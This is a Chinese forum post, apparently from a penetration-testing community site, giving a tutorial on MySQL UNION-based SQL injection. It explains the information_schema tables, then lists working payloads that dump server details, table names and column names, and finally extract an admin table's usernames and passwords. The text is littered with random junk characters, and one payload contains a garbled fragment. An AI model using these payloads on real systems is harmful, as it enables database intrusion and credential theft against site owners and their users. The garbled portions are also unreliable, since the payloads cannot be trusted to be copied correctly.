中国网络渗透测试联盟

标题: mysql常规注入 [打印本页]

作者: admin    时间: 2012-9-13 17:48
标题: mysql常规注入
本文介绍MYSQL盲注的一些语句和方法
+ V/ ]- v7 I5 |4 U0 c6 B  T: g, [8 S$ B# ^# Y( }0 h, g
学习盲注前先了解下 IFORMATION_SCHEMA 库+ g$ f$ J; Q$ X, D5 ^# `; _
* ]+ I$ K% f6 d' z' Q7 A0 F
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
/ Y. U; T7 t1 k& d$ Z' K存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。0 Z4 d7 o8 H: N* K9 z' y  g
1.得到所有数据库名:/ l* B0 J$ W9 {% y- m6 F3 A( n9 j
|SCHEMATA ->存储数据库名的表
' e% N7 ?$ R2 k/ N|---字段:SCHEMA_NAME ->数据库名称
" f/ m% c, W1 R9 p; p- R0 @, `' h! q3 T6 Y2 v, r$ _
|TABLES ->存储表名
" Q( C8 {) H8 x9 S" Z|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
- g7 |3 J5 s0 M( m|---字段:TABLE_NAME ->存储表的表名
1 A+ Z* u, G4 D) _# [4 o! T. [- z# ]3 @: K9 g
|COLUMNS ->存储的字段名表, j4 C0 X5 Y( u! Q
|---字段:TABLE_SCHEMA ->该字段所属数据库名
: g% r) ?" M: N: i- N7 \1 ~/ v! _|---字段:TABLE_NAME ->存储所属表的名称
' k6 x& q/ |9 M, }- a* M& c; X% U7 V- R% D/ m
|---字段:COLUMN_NAME ->该字段的名称* I! J% Z& u- V% S6 V. \9 B

" v2 n% Z: |9 j& Z; F; x8 d
5 x' n5 K1 n: S4 j$ k: n
: E6 T$ y+ o8 B9 |###########################################################################/ q7 S5 F9 S4 Q) d/ Y0 ~+ l2 M0 q
* J& W9 J* ?2 t5 [+ p
0x001 获取系统信息:+ K- l7 f% x' d* P* p8 j
) E: r; p4 l- o. ^# h% L  |
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
0 ?) ~, W8 ~, s3 c4 C1 l8 y: w% ~0 v$ B
/*
: C5 W+ l& w$ @9 P* R" \# w6 @8 u) h/ _2 w, M8 U% Z9 _
@@global.version_compile_os 获取系统版本
& r$ Z! D2 @1 R1 V
2 e, c% A9 }+ m5 x; x+ [@@datadir 数据库路径
0 }* R* E' e7 I0 e# ?/ rdatabase() 当前数据库名称  z* p% {. B8 q
0x3c62723e 换行HEX值
4 T4 J# x9 s$ g1 J. i
& E; K* y6 n5 D9 `- s6 E6 \*/
0 q. L# T3 F" }# |
* B- B0 n+ `6 Q& @! J& H4 d
1 e0 y6 T: C0 q- A, {1 q
0 _; _( {1 J% W& Z& u######################################################################
( ^1 E: r2 f* w) T) w4 V% n# W. M# g% k: y0 ^
0x002 获取表名, i! {: A/ u2 Z3 ~* v

+ A4 U2 @6 c# S* z; e/ ~union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*; {4 u! N/ n% F* r9 l
. i' H: H. O4 y( L, u

3 p1 ]. C' [) C' U6 b6 r4 i' h* j- ~6 ^% y' j# L  T7 F
/*+ t( E, h. U5 Q( r: a
9 j$ ?: z6 L3 ^: X  x
0x67617264656e 为当前数据库名0 N. X- f; G  H( j
  F5 X% S/ T" r: _* l
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
6 N/ n3 g  L7 Q" y
2 e5 j7 {$ A2 K: r9 u" j7 V*/3 h4 e; z  z! F* B4 w( a

# T+ F/ I6 H% E" I, O######################################################################8 n! v* J8 e$ Q8 h( J) M

& u# R5 v; u  v$ v' z9 t 8 o  p/ u  I  z- P# h# s2 v& x1 u

" G5 h; a9 v$ i: ~* x' U5 L1 E8 S0x003 获取字段
: j' m1 n, G, O$ R
6 _- `! d. s  N7 {+ L( Punion select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
) w- r0 l& |; {% Q4 Q1 H$ m3 D7 `. e* z6 g2 o
/*1 ]0 V9 j2 {/ a/ Y2 Q% e
+ D! i) @3 S( q  ?
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段) @$ Q. W) A1 [9 ~  I- T7 C5 t% [
" d9 e" U$ `. \! N( I9 |
0x61646d696e ->选择一个表( }* w: }/ z% d1 j0 g! G

) k4 N$ F4 ?' j% k( K! g0x67617264656e ->数据库名# N4 N8 T5 Q3 f% g" I4 y
8 y' P: G$ ?5 T, \4 ^
*/
: ?! O$ T2 ~# x' E: q$ [+ C. Y0 E" ]: C/ a- ~
#####################################################################6 P" x0 q! b' G, Z( Z! A- ?
/ |* X. w; ?4 x# u5 j8 K

: V* W9 N6 t( o" w2 G, w$ ?
( Q5 x6 ?5 B) A% ^* k4 F+ Y4 o0 g0x004 获取数据# L% J5 w( S0 n) t5 C' ^0 r7 j

8 ~1 Q* j3 b. E- \union select 1,2,31 k3 a/ \6 x7 {( ]5 U) g" \
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin* k, c0 P8 Q4 g
& k: K1 ^7 k& y8 a. F3 U2 g
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
' r7 q, n) Q; M) @' `* z; j' t$ \2 r9 q9 Y( ]  a8 h4 b/ L
6 h' q2 o3 u3 x' \' R( K9 {
$ r& d; ]+ q6 o) F4 c! _! K3 [
/*9 A1 a  W" P3 F2 i- Y5 g8 ?" N
% V* t7 b. u( r+ a( i7 s9 E
0x3c62723e 换行符号HEX编码
; j6 h. b: E6 U  K! [, n
# v+ x6 q, N3 Tgroup_concat 同时获得该字段所有数据1 D0 {0 u1 O/ }6 N1 B0 a  b, k
( {4 l* y3 L. W7 A% q
*/
6 a" N8 x- h% d& ~: `0 W$ P
/ E& Y+ z  W2 L! I) A( v




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2